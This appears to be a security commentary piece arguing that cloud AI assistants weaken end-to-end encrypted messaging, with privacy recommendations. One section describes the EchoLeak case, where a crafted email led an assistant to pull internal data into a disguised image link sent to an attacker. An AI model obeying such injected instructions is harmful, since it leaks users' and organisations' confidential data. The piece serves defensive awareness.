Where is the endpoint?
A recent paper, How to Think About End-to-End Encryption and AI, raises a lot of important questions and suggests that incorporating AI into messaging forces us to either redefine “endpoint” or extend the boundaries of the encryption process.
If the AI is running entirely on your device, in theory, it could still be part of the trusted endpoint. But this is not always the case. More powerful AI models, such as those for complex tasks, rely on the cloud. When your message is sent to an external server for AI processing – even temporarily – a new, unintended entity is reading your content.
Even when the AI is hosted in secure, isolated environments, the classic E2EE model is compromised. The platform may not store your message or “read” it in a traditional sense, but the content has now passed through a system that is not the target recipient. If E2EE is meant to give users confidence that their data stays private, the introduction of AI assistants tarnishes this trust.
Redefining privacy expectations
To be clear, this does not mean that AI and privacy are mutually exclusive. When implemented thoughtfully, AI features can make life easier, while also keeping data secure. But the key word is thoughtfully.
Consider the following when assessing how AI and private communications can coexist:
- Transparency: Users should know exactly what data is being processed, where it’s being processed, and whether the assistant is hosted locally or in the cloud.
- True opt-in control: AI features should be off by default, especially in encrypted messaging apps. If users want to use them, they should actively opt in, with a clear explanation of what that means for their privacy.
- Updated definitions of E2EE: If platforms are extending the definition of an “endpoint” to include secure cloud environments or AI services, they should say so.
- Collective privacy: If one participant of a group chat is utilizing an AI assistant, are they sharing everyone’s messages with that tool?
It’s not just a privacy issue, it’s a business risk
EchoLeak is a red flag for business leaders. It demonstrated that AI assistants can silently exfiltrate sensitive company data. A single email, phrased to bypass prompt injection protections, could cause an AI assistant like Copilot to retrieve internal organizational data and embed it into a disguised image link. From there, the victim’s browser would unknowingly send the data to an attacker-controlled server—no malware, no endpoint compromise, just abuse of how AI interprets and responds to context.
Even though Microsoft addressed the issue before public disclosure, the vulnerability received a critical 9.3 CVSS score, highlighting just how severe the implications are for organizations working to protect their data. As AI assistants are being further integrated to handle proprietary conversations such as upcoming company plans or client data, the possibility of a breach without human error or user interaction will only grow.
There is also the question of collective exposure. If one person in a group chat enables an AI assistant like Copilot, could they inadvertently share everyone’s messages with that tool? Imagine a conversation about a confidential product roadmap, now processed by a third-party cloud model. Are those messages still protected? Or has sensitive data crossed a line no one realized existed?
A new consideration for defenders
Defenders have long focused on human error, but AI assistants handling decrypted content are shifting the threat model. When large language models (LLMs) process sensitive information, they become part of the attack surface. The EchoLeak vulnerability exposed a new category of risk called LLM scope violations, where AI systems unintentionally leak internal data without user intent or awareness. These attacks don’t rely on malware or phishing, they exploit how AI interprets prompts and retrieves context. Defenders need to start treating AI tools as active parts of the security stack. That includes monitoring where AI processing happens, ensuring guardrails are in place for both inputs and outputs, and evaluating how third-party AI features interact with sensitive workflows. If AI assistants can access shared documents or messages, especially in group settings, organizations need to know whether one user’s decision to enable AI puts others at risk. These systems must be audited, restricted where necessary, and included in broader threat modeling efforts moving forward.
The path forward
The EchoLeak vulnerability made it clear that AI assistants can be manipulated to leak sensitive data. It also revealed a broader category of risk: LLM scope violations, where large language models unintentionally expose internal information based on how they interpret prompts and retrieve context.
End-to-end encryption was built to keep messages private. But that privacy starts to break down when decrypted content is passed to an AI assistant. Even if processed securely, the message is no longer limited to the original sender and recipient.
This is not an argument against AI, when done well, these tools improve usability, accessibility, and productivity. But it is an argument for doing it right.
That means giving users true opt-in control, offering clear visibility into when and how AI is used, and reexamining what secure communications should mean in an era where apps don't just deliver messages, they interpret them too.
The way we define privacy has always evolved with the technology we use. As AI becomes part of how we communicate, we have a responsibility to ensure it doesn't also become the quiet third party in conversations we thought were just between us.